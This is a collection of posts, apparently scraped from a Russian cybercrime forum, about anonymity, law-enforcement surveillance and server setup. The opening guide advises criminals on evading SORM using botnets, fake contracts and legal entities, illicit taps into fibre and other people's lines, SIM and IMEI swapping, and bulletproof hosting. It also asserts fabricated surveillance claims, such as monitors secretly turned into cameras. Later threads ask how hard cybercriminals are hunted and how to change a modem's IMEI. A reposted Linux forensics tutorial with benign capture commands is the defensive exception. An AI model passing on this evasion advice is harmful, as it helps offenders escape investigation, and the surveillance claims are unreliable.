Также COPM-2 стоит на VPN и прокси, не на всех но на многих, особенно на легальных. Многие прокси в системе COPM-2, другие дают ваши логи по запросу или просто достаточно приехать, как вас сдадут, хотя и многие говорят, что не ведут логи, не верьте.
Не имеет значения сколько прокси вы используете, достаточно приехать в другую страну и все логи будут у большого брата.
Все прокси ведут логи и через их раскрутку рано или поздно выйдут на вас, вы можете выиграть только время. Также и обстоит с дата центрами, для безопасности нужен собственный сервер и собственный человек в дата центре и желательно в дц за рубежом.
При регистрации домена пробивают реальность человека, если определяется что данные не действительны, домен ставят на заметку.
Также COPM использует целую сеть TOR которые прослушивают проходящий через них трафик.
Эшелон – это на много более совершенное оборудование, такая система установлена на Google, встроена в Windows в виде закладок, на всех оптических кабелях и дата центрах мира, при желание оператора эшелона, он задействует спутник и смотрит на вас в режиме реального времени в монитор. Владелец Эшелона ЦРУ. Русские спец. службы не имеет доступ к данной системе, но может потребовать данные по официальному запросу.
Здесь я очень кратко опишу, что может сделать пользователь для обеспечения анонимности:

1. Использовать виртуальную операционную систему

2. Защита от вирусов, троянов, вирусов и рукитов, использовать комплекс программ по отдельности и только последние версии

-антивирус NOD 32
-Anti Trojan Elite
-Антируткит UnHackMe
- от государственных вирусов использовать виртуальную машину с прокси и обязательно с виртуальной клавиатуры
-использовать EToken
-использовать antikeylogger

3. Защита фаервола

-используем Outpost Firewall Pro, настраиваем, сканируем порты, открываем и закрываем

4. Шифруем и скрываем

-True Crypt
-для скрытия Steganos Privacy Suite
5. Глобальное скрытие данных

-Proxy
-VPN
-Open VPN
- SSH-туннелинг
-JAP
-TOR (были случаи ареста сидевшие под TOR)

6. Использозуем выход в интернет не домашнего провайдера

Здесь опишу о тех процессах, которые могут выявить ваш ip
Cookies – IP с помощью куков не определить, но при первом входе на сайт, ip адрес клиента сервер может сохранить в куках, а при следующем входе на сайт уже под прокси, сервер видит что ip другой и делает выводы, поэтому если вы не отключите куки то не какой прокси вас не спасёт
Java Script- Пограмма, написанная на этом языке может без особых трудностей определить ваш реальный IP и любые настройки браузера. Для защиты только одно решение, отключить JAVA полностью.
Active X- это программы которые выполняются на вашем компьютере, они могут узнать настройки браузера, "вычислить" Ваш реальный IP адрес, и даже легко изменить настройки прокси. Защитой от них является полный запрет ActiveX.

Абузаустойчивость

Обозначает стойкость ресурса к различного рода жалобам, СОРМам и Эшелонам, решениям судов.
В общем по большому счету все абузность для серьезных дел липовая, для серьезных дел лучший вариант дата центр в Китае Малайзии со своим человеком и со своим сервером либо пиратское подключение к магистральному оптоволокну. Важно знать что луший вариант для размещения своего и прокси и vpn и своего сайта это абузаустойчивый хостинг.

Социальная инженерия

Например вы заходите на почту и сайты под разными никами и паролями, но так как поисковая машина, это большой шпион, вас могут идентифицировать по повторяющим запросам, поэтому вы должны вести себя как другой человек. Если вы на каком то ресурсе зарегистрировались под своим реальным ip, то единственное что можно сделать бросать свой ник, заводить другое имя, бросать icq, почту и всё что вы засветили при регистрации с реального ip. Вся ваш информация сразу попадёт в COPM-2, её база данных составляет 5 Питабайт, у Эшелона 70 Питабайт.
Самые стандартные способы когда ловят, человек зарегистрировался на ресурсе указал почту, и забыл что почту оформлял с реальным ip, или завел новый ник а ip оставил старый и т.п. случаи. Главное чтобы виртуальные профили не пересекались с вашим реальным ip и данными железа реального ПК.
DNS
Информация о вашем домене, не скрывается так просто как ip, скрывается VPN, в других случаях требует специальной настройки или специальных программ соксификаторов трафика - чуть ниже я приведу их

MAC адрес сетевой карты
Внутренний адрес сетевой карты который привязывается к вашему ip адресу, по этому принципу СОРМ а также банки, программы электронной коммерции определяют ваш ip, даже после его замены.

Идентификаторы системы
Различные характеристики, номер процессора, номер HDD, тип ОС, язык ОС, браузер и еще куча параметров по которым сервер определяет вашу уникальность и запоминает эти параметры.
Что же всё таки нужно сделать для вашей безопасности, что бы обеспечить себя от COPM
- использовать бот сеть и личные проси, чем больше, тем лучше
- использовать личный тройной VPN
- для серфинга и проксификации всех программ использовать Proxifier Portable
- Для скрытие мак использовать виртуальную машину
- Для электронной коммерции ставим патчи на виртуальную машину
- Используем True Crypt для шифрования разделов и создаём несколько скрытых разделов, уже были случае когда сажали людей т.к. они не предоставляли пароль от True Crypt, для этого делаем скрытые
-Размещаем на съемном зашифрованном разделе образ Виртуальной машины + контроль по Биометрии – радужка
-Используем программы плагины для шифрования почты, скайп и т.д.
- Для запутование социальной инженерии размещаем 10 Профилей Виртуальных, 2 аппаратных
-Для более лучшей безопасности использовать кластер из 5 и более VPN серверов с внутренним тоннелированием и зеркалированием, фактически не вскрываема
- Используем нетбук ( который нигде более не используем ) и липовый контракт на Wi Max (лучше ) Wi-Fi GSM ( хуже ) садимся в такси и едем в густом потоке машин, работа не более 30 минут. Периодически меняем симки и перепрошиваем IMEA телефона
- как вариант для 100 mb линии,оформляем контракт на старушку или либо подключаемся к существующему "чайнику" к линии LAN, вариант более дорогой, заключаем договор от липового ЮЛ с дата центром на аренду канала , из подвала,или из арендованного помещения в трудно доступном месте делаем распределительную коробку и отводим кабель на 100 или на 1000 - 5000 м ( для удлинения коммутаторы есть дешевые ) На распределительной коробке и в квартире "бомжа" ставим сигналку на движение или рывок провода и ставим в 2 - 3 места web-камеру. При обнаружении гостей, оперативно кабель обрубаем и выкидываем , хотя если правильно провести его концы двое суток искать будут. Поскольку в сети и в здании вы не все время, там должен быть человек либо настроена система с подрывом кабеля и его сматыванием - это не так уж и сложно. Конечно возможны варианты, главное понять, что независимые каналы связи не привязанные к вашим реальным данным - это ваш дополнительный козырь
Если выполнить все эти условия, вы получаете полную анонимность от COPM, но также хочу рассказать, что более 30 лет под знаком Сов секретно COPM подобралась к подобной технологии. Итак все ЖК Мониторы, Плазма - имеют в своей основе что ? Правильно транзисторы, вся площадь за матрицей монитора, это оромное количество тразисторов которые регулируют работу пикселей. По большому счету все наши ПК и мониторы это шпионы врага. Вкратце существует програмный комплекс "Медуза Горгона ", который определив ваш ip ( либо просто через радиосвязь на расстоянии до 2 км ) , взаимодействует с драйвером дисплея и превращает его по сути в активную фазировнную решетку излучателя. Или гигантскую матрицу видеокамеры которая излучая слабые сигналы принимает их от окружающего пространства обратно и формирует изображение, хотя изображения и не супер качества, но ваш фотопортрет вполне могут составить.

Форензика в Linux. Дампим память, диски и сетевые коннекты для дальнейшего поиска улик

ID: 676533bbb4103b69df371d62
Thread ID: 28606
Created: 2019-04-05T13:24:51+0000
Last Post: 2019-04-05T13:24:51+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

Форензика в Linux. Дампим память, диски и сетевые коннекты для дальнейшего поиска улик

Первая задача в цифровой криминалистике — это сбор информации, конкретно — получение образов жестких дисков и оперативной памяти, а также, если это может помочь, дампов сетевых соединений. В этой статье мы посмотрим, что нужно сделать для получения всего этого на машинах с Linux, а заодно научимся и другим полезным навыкам.

Это новая часть цикла по форензике для новичков, в котором мы рассказываем о том, что такое цифровая форензика, разбираем наиболее популярные инструменты анализа, изучаем несколько кейсов на устройствах с Android и расследуем хищение денежных средств из системы ДБО на ноутбуке с Windows 10.
Предыдущие статьи цикла:

«Теория, книги, курсы, полезные материалы»
«Находим источники данных, ищем и анализируем артефакты»
«Android под колпаком. Как раскрывают кейсы взлома мобильных устройств»
«Тайна казначейского ноутбука. Используем форензику, чтобы раскрыть ограбление»

Есть много вариантов создания дампа содержимого жесткого диска или оперативной памяти. При этом можно использовать и нативные утилиты, входящие в состав дистрибутива, и сторонние программы — как со свободной лицензией, так и коммерческие. Я по возможности сосредоточусь на наиболее известных, максимально простых и рабочих инструментах.

Первым делом на «живые» системы я рекомендую ставить утилиту Auditd — с ее помощью можно получить детальные сведения об изменениях системы в режиме аудита.

Прежде всего нас будут интересовать такие события, как:

запуск и завершение работы системы (перезагрузка, остановка);
чтение/запись системных файлов и изменение прав доступа к ним;
инициация сетевого соединения и изменение сетевых настроек;
изменение информации о пользователе или группе;
изменение даты и времени;
установка, удаление, запуск и остановка программ и демонов;
выполнение системных вызовов.

Также рекомендую настроить системный syslog.conf и скорректировать правила сбора сообщений: увеличить глубину собираемых алертов (уровень 7) и пул источников (диапазон от 0 до 15). Это все позволит наблюдать за изменениями системы в реальном времени.

Некоторые особенности форензики в Linux
В прошлой статье, которая была посвящена кейсу с хищением денежных средств в ДБО на Windows 10, мы по возможности использовали в качестве инструментария программы с графическим интерфейсом. Если не брать проприетарные решения, такие, к примеру, как EnCase Forensic или Belkasoft Evidence Center, то на Linux большинство рабочих утилит идет в режиме командной строки.

Использование тестовых команд существенно экономит время на манипуляции с софтом, но, с другой стороны, может оказаться слишком сложным для новичков. Однако форензикой новички обычно и не занимаются!

Помимо отдельных утилит, есть целые дистрибутивы, предназначенные для цифровой криминалистики. Это прежде всего DEFT, CAINE, [Sumuri PALADIN](https://sumuri.com/product-category/software/sumuri- software/paladin/), Helix, ну и, конечно же, всем известный Kali Linux. Полный обзор дистрибутивов и тулкитов для форензики можно прочитать в статье «Тулкит для форензики. Выбираем дистрибутив и набор софта для криминалистического анализа».

Из литературы по форензике в Linux я бы в первую очередь порекомендовал едва ли не единственную полноценную книгу об этом. Ее написал Филип Полстра, а называется она [Linux Forensics Paperback](https://www.amazon.com/Linux- Forensics-Philip-Polstra/dp/1515037630/). Во вторую очередь — издание [UNIX and Linux Forensic Analysis DVD Toolkit](https://www.amazon.com/UNIX-Linux- Forensic-Analysis-Toolkit/dp/1597492698/) Криса Пога и других. Ну и в-третьих, [Digital Forensics with Kali Linux](https://www.amazon.com/Digital-Forensics- Kali-Linux-investigation/dp/1788625005/).

Общий чек-лист проверки

Для поиска и сбора криминалистических доказательств мы первым делом создадим образы (дампы) следующих объектов наших систем:

оперативная память (системные и пользовательские процессы, демоны, возможно запущенный вредоносный код и так далее);
жесткий диск (посекторная копия HDD, включающая удаленные разделы, неразмеченные области диска, потертые файлы, скрытые файлы и директории и прочее);
сетевой стек (поднятые коннекты, открытые порты, «неизвестные» сервисы на портах, паразитный трафик).

В рамках самой операционной системы мы будем обращать особое внимание в первую очередь:

на список пользователей, группы, привилегии;
запущенные от имени root процессы;
задачи, запускаемые по расписанию (cron jobs);
файлы с установленным битом SUID и SGID;
состав файла /etc/sudoers;
скрытые файлы и директории;
файлы, открытые на чтение в системе;
сетевые интерфейсы, соединения, порты, таблицу маршрутизации;
логи iptables, fail2ban (Reports, Alarms, Alerts);
конфигурацию /etc/ssh/sshd_config;
логи демона Syslog (проверим на типичные алерты);
состояние SELinux;
список загруженных модулей ядра.

Ну и в качестве дополнительной опции можно собрать контрольные суммы с основных системных файлов (к примеру, утилитой TripWire), а позже сравнить их с эталонными значениями в исходном дистрибутиве. Но этот процесс весьма нетривиален и требует большого запаса времени и нервных клеток. Поэтому подробности мы любезно опустим.

Поскольку железо, на котором крутится вся ферма, находится в надежном дата- центре, сразу отметается поиск артефактов, связанных с сетевой ФС (NFS), локально смонтированными устройствами и подключенными по USB девайсами.

Всегда хорошо обдумывай, какое именно действие и для какой цели ты делаешь. Неправильное использование приведенных в тексте статьи программ может привести к потере информации (артефактов) или искажению полученных данных (криминалистических доказательств). Ни автор, ни редакция не несут ответственности за любой ущерб, причиненный при неправильном использовании материала данной статьи.

Снимаем образ HDD

Посекторную копию жесткого диска вполне можно снять, не прибегая к дополнительным утилитам. Мы будем использовать старую и проверенную в работе нативную тулзу dd. Она позволяет создавать точные побитовые копии — как целых дисков, так и отдельных разделов и даже просто файлов.

Снятие образов дисков и работа с ними штатными средствами системы может привести к непреднамеренной записи, что в серьезной криминалистике исключено. Подробности читай в статье «Тулкит для форензики» (раздел «Как не наследить следопыту»). Используй команды ниже, только если считаешь, что в твоем случае это допустимо.
Но первоначально запросим у системы полный список разделов с помощью команды fdisk :

Code:Copy to clipboard

$ fdisk -l

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F04%2F215285%2F1.png&hash=bf0422823815dc52a30057a75b36343c)
Просмотр списка файловых систем

Базовый синтаксис dd выглядит так:

Code:Copy to clipboard

$ dd if=<source> of=<destination> bs=<byte size>

К примеру, для создания копии HDD с размером кластера 512 байт:

Code:Copy to clipboard

$ dd if=/dev/sda1 of=/dev/sdb1 bs=512

В процессе копирования HDD могут быть поврежденные сектора. Чтобы программа не спотыкалась о них и не останавливала работу, необходимо добавить дополнительный ключ -noerror :

Code:Copy to clipboard

$ dd if=/dev/sda1 of=/dev/sdb1 bs=512 noerror

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F04%2F215285%2F2.png&hash=d18217ee2cfb730b4e98f2b13f97fb82)
Результат работы утилиты dd

Однако лучшие мировые практики — это использовать усовершенствованный вариант предыдущей утилиты под названием dcfldd. Эта тулза разработана в компьютерной судебной лаборатории DCFL и имеет ряд специальных опций для снятия дампов с целью криминалистического анализа. Например, dcfldd умеет хешировать копируемые данные и проверять их целостность. По ходу дела отображается прогресс создания дампа, действия заносятся в лог, а контрольные суммы MD5 сохраняются в отдельный файл.

Пример выполнения команды:

Code:Copy to clipboard

$ dcfldd if=/dev/sda1 hash=md5 of=/media/forensic_disk_image.dd bs=512 noerror

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F04%2F215285%2F3.png&hash=f7bfabd04e2f8438290a928245d6b874)
Результат работы утилиты dcfldd

Вместо консоли при желании можно пользоваться графической версией уже известной нам по прошлой статье утилиты FTK.

Делаем дамп оперативной памяти
Как и в случае с жестким диском, существует несколько способов решить эту задачу. Среди вариантов:

использование нативного модуля ядра Linux Memory Extractor (LiME);
скрипт Linux Memory Grabber, который не требует установки и который можно запускать, к примеру, с флешки;
связка утилит lmap и pmem, которые входят в пакет Rekall. Их-то я и буду использовать.

Пара слов о Rekall. Это отдельная ветвь развития известного фреймворка Volatility Framework, которая написана на Python и предназначена специально для включения в форензик- дистрибутивы, работающие с Live CD.

Переходим в каталог с тулзой и собираем ее из исходников:

Code:Copy to clipboard

$ cd rekall/tools/linux/
$ make

Грузим драйвер ядра pmem.ko в оперативную память:

Code:Copy to clipboard

$ sudo insmod pmem.ko

Проверяем инициализацию драйвера:

Code:Copy to clipboard

$ sudo lsmod

После этого драйвер создает файл-контейнер под наш будущий образ RAM: /dev/pmem.

Теперь с помощью все той же утилиты dd создаем сам образ оперативной памяти системы:

Code:Copy to clipboard

$ dd if=/dev/pmem of=forensic_RAM_image.raw

Ну и после завершения работы выгружаем драйвер:

Code:Copy to clipboard

$ rmmod pmem

Дело сделано!

Сетевой трафик на анализ
Здесь в ходу несколько утилит: прежде всего — консольная tcpdump, классика жанра Wireshark и опенсорсный фреймворк XPLICO, хотя последний больше используется для последующего анализа данных, чем для их первоначального сбора. Для тех, кто раньше не сталкивался с этими программами, у нас есть неплохие обучающие статьи по ним: «Проводим аудит сетевого трафика с помощью tcpdump» и «Как использовать возможности фильтров отображения Wireshark по максимуму».

Начнем с tcpdump. Базовый вызов команды выглядит следующим образом:

Code:Copy to clipboard

$ tcpdump <опции> <фильтр>

А вот некоторые наиболее важные опции:

-i интерфейс — задает интерфейс, с которого необходимо анализировать трафик;
-n — отключает преобразование IP в доменные имена;
-e — включает вывод данных канального уровня (например, MAC-адреса);
-v — вывод дополнительной информации (TTL, опции IP);
-w имя_файла — задает имя файла, в который нужно сохранять собранную информацию (дамп);
-r имя_файла — чтение (загрузка) дампа из заданного файла;
-q — переводит tcpdump в «бесшумный режим», в котором пакет анализируется на транспортном уровне (протоколы TCP, UDP, ICMP), а не на сетевом (протокол IP).

Дампим весь входящий трафик, идущий из интернета на наш сервер:

Code:Copy to clipboard

$ tcpdump -s 0 -i eth0 -n -nn -ttt dst host <ip-адрес нашего хоста> -w forensic_cap.pcap

Пример создания дампа сетевого трафика по протоколам FTP или SSH на интерфейсе eth0:

Code:Copy to clipboard

$ tcpdump -s 0 port ftp or ssh -i eth0 -w forensic_cap.pcap

Дампим вообще все, что идет на интерфейс eth0:

Code:Copy to clipboard

$ tcpdump -w forensic_cap -i eth0

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F04%2F215285%2F4.png&hash=78f5538907ddd17173fe7b2d75455f2e)
Результат работы tcpdump

Еде одна годная для наших целей утилита — это TCPflow. По сути, более продвинутый вариант tcpdump, который поддерживает еще больше параметров фильтрации и возможность восстанавливать «сломанные» пакеты.

Если TCPflow по умолчанию нет в системе, то для начала ставь пакет tcpflow.

Далее базовый синтаксис команды выглядит так:

Code:Copy to clipboard

$ tcpflow [опции] [выражение] [хост]

А вот описание опций:

-c — только консольная печать (не создавать файлы);
-d — уровень отладки (по умолчанию 1);
-e — выводить каждый поток чередующимися цветами (синий — клиент-сервер, красный — сервер-клиент, зеленый — неизвестно);
-i — сетевой интерфейс для прослушивания;
-r — чтение пакетов из выходного файла tcpdump;
-s — удалить непечатаемые символы (будут заменяться точками).

Пример сбора данных, идущих из внешней сети на наш сервер:

Code:Copy to clipboard

$ tcpflow -ce host  <IP-адрес нашего хоста>

Собираем весь трафик HTTP в нашей сети:

Code:Copy to clipboard

$ tcpflow -ce port 80

Дамп данных сетевого потока в локальную папку:

Code:Copy to clipboard

$ mkdir tcpflowdata  
$ cd tcpflowdata  
$ tcpflow host <IP-адрес целевой машины>

Теперь в директорию /tcpflowdata будут складываться файлы с содержанием сетевых подключений. Все, что нам потом останется сделать, — это перекинуть их для анализа в парсер.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F04%2F215285%2F5.png&hash=0d989008e0d445bd3ae894a91487c127)
Результат работы TCPflow

Получаем доступ к собранным данным

Образы жестких дисков и оперативки готовы. Теперь нам нужно их смонтировать на исследовательской машине, чтобы начать искать и изучать артефакты. С образом HDD все просто, выходной файл, полученный в результате работы dd или dcfldd, можно легко подмонтировать как новое устройство.

Синтаксис команды mount выглядит так:

Code:Copy to clipboard

$ mount -o,ro,noatime,loop,offset= <смещение по началу партиции в байтах> <имя файла образа> <точка монтирования>

К примеру, чтобы смонтировать ранее снятый дамп HDD, нужно выполнить команду

Code:Copy to clipboard

$ mount -o,ro,loop forensic_disk_image.dd /mnt/temp/

Образ RAM будем открывать с помощью Volatility Framework, но об этом поговорим чуть ниже, в разделе «Поиск артефактов».

Файл .pcap с дампом сетевых подключений открывается в Wireshark или XPLICO. Но я предпочитаю пользоваться сервисами с полуавтоматическим парсингом, например PacketTotal, Pcap Analyzer или платным CloudShark.

Другие полезные команды

Вот несколько команд, которые помогут дособрать все, что мы могли пропустить. Некоторые вещи — просто на всякий случай, потому что это не займет много времени.

Мгновенно получить состояние системы и основные характеристики конфигурации

Code:Copy to clipboard

#!/bin/bash
dmesg > dmesg.txt
cat /proc/mounts > proc_mounts.txt

// Собираем контрольные суммы со всех смонтированных на текущий момент устройств
for p in $(md5sum /proc/mounts /proc/*/mounts | sort | uniq -d -w 32 | awk '{print $2}'); do
cat $p > ${p////_};
done

cat /proc/mdstat > proc_mdstat.txt
lspci > lspci.txt
uname -a > uname_a.txt
uptime > uptime.txt

Перемонтировать все файловые системы только для чтения
Для каждой файловой системы, которую мы будем ковырять, перемонтируем в режиме ro:

Code:Copy to clipboard

// set mountpoint

MOUNTPOINT=/home
mount -o remount,ro ${MOUNTPOINT}

И создадим timestamp или временную шкалу:

Code:Copy to clipboard

find "${MOUNTPOINT}" -xdev -print0 | xargs -0 stat -c "%Y %X %Z %A %U %G %n" >> timestamps.dat

Получить состояние существующих подключений и открытых сокетов

Code:Copy to clipboard

// --verbose --wide --extend --timers --program --numeric (--listening)

netstat -v -W -e -o -p -n     > netstat_vWeopn.txt
netstat -v -W -e -o -p -n -l  > netstat_vWeopnl.txt

// same without --numeric
netstat -v -W -e -o -p        > netstat_vWeop.txt
netstat -v -W -e -o -p -l     > netstat_vWeopl.txt

Текущий дамп кеша ARP

Code:Copy to clipboard

arp -n > arp_n.txt
ip neigh show > ip_neigh_show.txt

Захватить состояние текущих правил сетевого фильтра iptable

Code:Copy to clipboard

// --verbose --numeric --exact --list --table
for table in filter nat mangle raw; do iptables -v -n -x -L -t ${table} >        iptables_vnxL_t${table}.txt; done
for table in filter mangle raw; do ip6tables -n -t ${table} -L -v -x > ip6tables_nt_${table}.txt; done
for table in filter nat broute; do ebtables -t ${table} -L --Lmac2 --Lc > ebtables_L_Lmac_Lc_t_${table}.txt; done

Дамп ipsets (обычно используется fail2ban и firewalld)

Code:Copy to clipboard

ipset list > ipset_list.txt

Сохранить таблицу процессов

Code:Copy to clipboard

ps auxwwwe > ps_auxwwwe.txt

Другой вариант с более читабельным выводом:

Code:Copy to clipboard

pstree -a -l -p -u    > pstree_alpu.txt
pstree -a -l -p -u -Z > pstree_alpuZ.txt

Сохранить исходное местоположение исполняемого файла по PID

Code:Copy to clipboard

ls -l /proc/${PID}/ > proc_${PID}_ls_l.txt
cat /proc/${PID}/exe > proc_${PID}_exe

Посмотреть все открытые в системе файлы
Если файл был удален, то команда ls добавит флаг (deleted) к имени файла назначения. К содержимому все еще можно будет получить доступ, используя символические ссылки в /proc/${PID}/fd. Это часто помогает в работе с вредоносами, написанными на интерпретируемых языках, таких как Perl и Python. Поэтому для дальнейшего анализа мы сохраним все открытые файлы:

Code:Copy to clipboard

ls -l /proc/${PID}/fd > proc_${PID}_fd.txt

// copy interesting open files, substitute MYFD with file descriptor number

MYFD=1234
cat /proc/${PID}/${MYFD}> proc_${PID}_fd_${MYFD}

Выводы
Теперь у нас есть все необходимое для дальнейшего анализа. В следующей, заключительной статье цикла я покажу, что делать с полученными данными, чтобы найти в них артефакты. А чтобы было веселее, я припас для тебя интересный кейс с поиском заразы, которая завелась на серверах хостинг-провайдера. В общем, оставайся с нами!

Автор: Иван Пискунов aka g14vano
хакер.ру

Смена imei в модеме 3g

ID: 676533bbb4103b69df371d65
Thread ID: 28295
Created: 2019-03-15T09:39:51+0000
Last Post: 2019-03-15T17:37:01+0000
Author: 4orthy7eventh
Replies: 1 Views: 2K

Ребзя, кто выкупает , дайте совета.
Юзаю модем 3g хуавей , модель 352.
Когда захожу в програмку по смене imei( она же dc-unlocker) , беру основной imei и далее захожу в huawei calculator , там получаю 4 кода, после этого открываю опять же dc-unlocker и прописываю:
AP^DATALOCK=“xxxxxx”
Где x это код из канкулятора , после ввода 4 включительно кодов , везде выдаёт ошибку (error):

AP^DATALOCK=“xxxxxx”
Error

смотрел гайды , там у челиков все работает и пишет «OK» после ввода. Кто знает в чем трабл

Как сильно ищут киберпреступников? После какой суммы ущерба Тор перестаёт быть полностью анонимным?

ID: 676533bbb4103b69df3718e5
Thread ID: 128842
Created: 2024-12-12T18:49:03+0000
Last Post: 2024-12-18T18:10:49+0000
Author: nologs73
Replies: 22 Views: 2K

Начиная с какого уровня тебе нужно начинать использовать особо хитровы#банные схемы анонимности? А-ля старлинк по заветам локбита/роутер по заветам вот этой статьи и т.д.
Учитывая что в теории при желании всякие NSA смогут сдеанонить тебя, ведь 75% нод тора - на их территории + если в Intel ME есть бэкдор, тебя могут найти просто взламывая все твои ноды через него

Amnezia VPN, обсуждение?

ID: 676533bbb4103b69df3718e6
Thread ID: 122555
Created: 2024-09-12T07:18:15+0000
Last Post: 2024-12-18T10:03:42+0000
Author: sect adept
Replies: 16 Views: 2K

Всем привет. Хочу услышать мнение на счет амнезии. Стоит ли на нем разворачивать свой впн для работы по сетям или лучше присмотреться к нормальным протоколам? OpenVPN и Wireguard из коробки блочат.
Есть ли варик как-то сделать OpenVPN + XRay или что-то подобное без гемороя?
P.S. посоветуйте еще пожалуйста абузоустойчивые VPS для разворота своего VPN

Последствия 210 статьи УК РФ на наш бизнес.

ID: 676533bbb4103b69df3718f4
Thread ID: 34241
Created: 2020-01-08T15:09:25+0000
Last Post: 2024-12-03T13:58:34+0000
Author: bbi34yy
Replies: 7 Views: 2K

Читал о принятии в апреле этой статьи и "приемке" воров в законе на основе нее.
На первый взгляд нас это совершенно не касается, но тем не менее пару "выдержек" приложу тут:

1. Создание преступного сообщества (преступной организации) в целях совершения одного или нескольких тяжких или особо тяжких преступлений либо руководство преступным сообществом (преступной организацией) или входящими в него (нее) структурными подразделениями, а равно координация действий организованных групп, создание устойчивых связей между ними, разработка планов и создание условий для совершения преступлений организованными группами, раздел сфер преступного влияния и (или) преступных доходов между такими группами -

наказываются лишением свободы на срок от двенадцати до двадцати лет со штрафом в размере до пяти миллионов рублей или в размере заработной платы или иного дохода осужденного за период до пяти лет либо без такового и с ограничением свободы на срок от одного года до двух лет.

Click to expand...

2. Участие в преступном сообществе (преступной организации) -
наказывается лишением свободы на срок от семи до десяти лет со штрафом в размере до трех миллионов рублей или в размере заработной платы или иного дохода осужденного за период до пяти лет либо без такового и с ограничением свободы на срок от одного года до двух лет.

Click to expand...

Я не силен в юридических аспектах, поэтому поправьте, если не прав. Можно сажать практически любого, если докажут только причастность к сообществу. Чем, по сути, форумы и являются.
Какие мысли?

Анонимный VPS. Поднимаем свой почтовый сервер, а так же XMPP

ID: 676533bbb4103b69df3718fd
Thread ID: 125055
Created: 2024-10-18T17:30:52+0000
Last Post: 2024-11-25T12:49:14+0000
Author: hahbah
Prefix: Статья
Replies: 11 Views: 2K

**Автор:hahbah
Источник: **XSS.is

Доброго всем времени суток.
В данной статье для поднятия собственного почтового сервера, я буду использовать Postfix(для обработки SMTP)+ Dovecot(для IMAP/POP3 и авторизации) + Let’s Encrypt (для TLS-сертификатов) + OpenDKIM.
Postfix и dovecot наше все.

Для начала нам нужен VPS и домен.
VPS берем самый простой, достаточно даже одноядерного. Стоимость менее, чем 5$ в месяц. Так же домен, иногда хостинг его предоставляет, но для наглядности я его отдельно взял.
VPS я брал тут hyper.hosting, пополнение криптой есть, но анонимности мало.
Домен советую брать тут - njallalafimoej5i4eg7vlnqjvmb6zhdh27qxcatdn647jtwwwui3nad.onion(clear

njal.la), приватно, оплата криптой(цены от 15eu), регестрация через xmpp есть.

На vps должен стоять linux, я ставил ubuntu 24, так же открыты порты, в этой статье я использовал 25, 587, 465, 5222, 5269. Обычно проблемы могут быть только с 25.
Привязываем наш домен к ip vps. Домены, которые я использовал: lolasdelights.com, mail.lolasdelights.com, xmpp.lolasdelights.com.

Установка Postfix.

Code:Copy to clipboard

sudo apt update && sudo apt upgrade -y
sudo apt install postfix -y

Во время установки будет диалоговое окно, там выбираем "Internet Site" и вводим наш домен.
Дальше надо настроить конфиги.
Первый конфиг main.cf:

Code:Copy to clipboard

sudo nano /etc/postfix/main.cf

Вот мой конфиг, с комментариями и доп инструкциями:

Code:Copy to clipboard

# Объявление баннера для SMTP-сервера при подключении
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
# Отключение отправки сообщений biff
biff = no

# Не добавлять точку в конце доменного имени
append_dot_mydomain = no

# Отключение директории с документами Readme
readme_directory = no

# Совместимость с версиями Postfix
compatibility_level = 3.6

-- Параметры TLS --

Code:Copy to clipboard

# Указание сертификата TLS для шифрования
smtpd_tls_cert_file=/etc/letsencrypt/live/mail.lolasdelights.com/fullchain.pem

# Указание приватного ключа TLS
smtpd_tls_key_file=/etc/letsencrypt/live/mail.lolasdelights.com/privkey.pem

# Включение TLS для SMTP-сервера
smtpd_use_tls=yes

# Разрешать аутентификацию только через TLS
smtpd_tls_auth_only = yes

# Ограничение клиентских подключений
smtpd_client_restrictions = permit_mynetworks, reject_unknown_client_hostname, permit

# Указание пути к сертификатам CA для проверки TLS
smtp_tls_CApath=/etc/ssl/certs

# Уровень безопасности TLS для исходящей почты
smtp_tls_security_level=may

# Использование кэша для TLS-сессий, чтобы ускорить повторные соединения
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache

# Включение логирования для TLS
smtpd_tls_loglevel=1

-- Параметры SASL (аутентификация) --

Code:Copy to clipboard

# Ограничения безопасности SASL (запрещает анонимную аутентификацию)
smtpd_sasl_security_options = noanonymous

# Указание на использование Dovecot для SASL
smtpd_sasl_type = dovecot

# Путь до сокета для аутентификации через Dovecot
smtpd_sasl_path = private/auth

# Включение аутентификации SASL
smtpd_sasl_auth_enable = yes

# Правила для разрешения отправки
smtpd_recipient_restrictions =
    permit_sasl_authenticated,    # Разрешить авторизованным пользователям
    permit_mynetworks,            # Разрешить для доверенных сетей
    reject_unauth_destination     # Отклонить отправку в неавторизованные домены

-- Конфигурация Milter для DKIM --

Code:Copy to clipboard

# Протокол для milter (mail filter)
milter_protocol = 6

# Принимать почту, если milter недоступен
milter_default_action = accept

# Указание на milter для аутентификации почты через порт 12301
smtpd_milters = inet:localhost:12301

# Настройка для взаимодействия с milter на всех интерфейсах
non_smtpd_milters = $smtpd_milters

-- Основная конфигурация Postfix --

Code:Copy to clipboard

# Имя хоста сервера
myhostname = mail.lolasdelights.com

# Основной домен для сервера
mydomain = lolasdelights.com

# Происхождение всех писем (исходящие письма будут иметь этот домен в поле "От")
myorigin = $mydomain

# Настройки для работы alias
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases

# Домены, отвечающие за доставку почты
mydestination = $myhostname, localhost.$mydomain, localhost, lolasdelights.com

# Реле для исходящих писем (если нужно перенаправлять почту через другой сервер)
relayhost =

# Сети, которые считаются доверенными
mynetworks = 127.0.0.0/8 [::1]/128

# Использование формата Maildir для хранения почты
home_mailbox = Maildir/

# Ограничение на размер почтовых ящиков (0 — без ограничения)
mailbox_size_limit = 0

# Разделитель для пользователей (например, user+label@example.com)
recipient_delimiter = +

# Интерфейсы, на которых сервер будет слушать
inet_interfaces = all

# Протоколы, которые будет поддерживать сервер (all — IPv4 и IPv6)
inet_protocols = all

Настройка master.cf:

Code:Copy to clipboard

sudo nano /etc/postfix/master.cf

Тут достаточно сложный конфиг, но нам надо только проследить, чтобы все протоколы и порты работали.

Code:Copy to clipboard

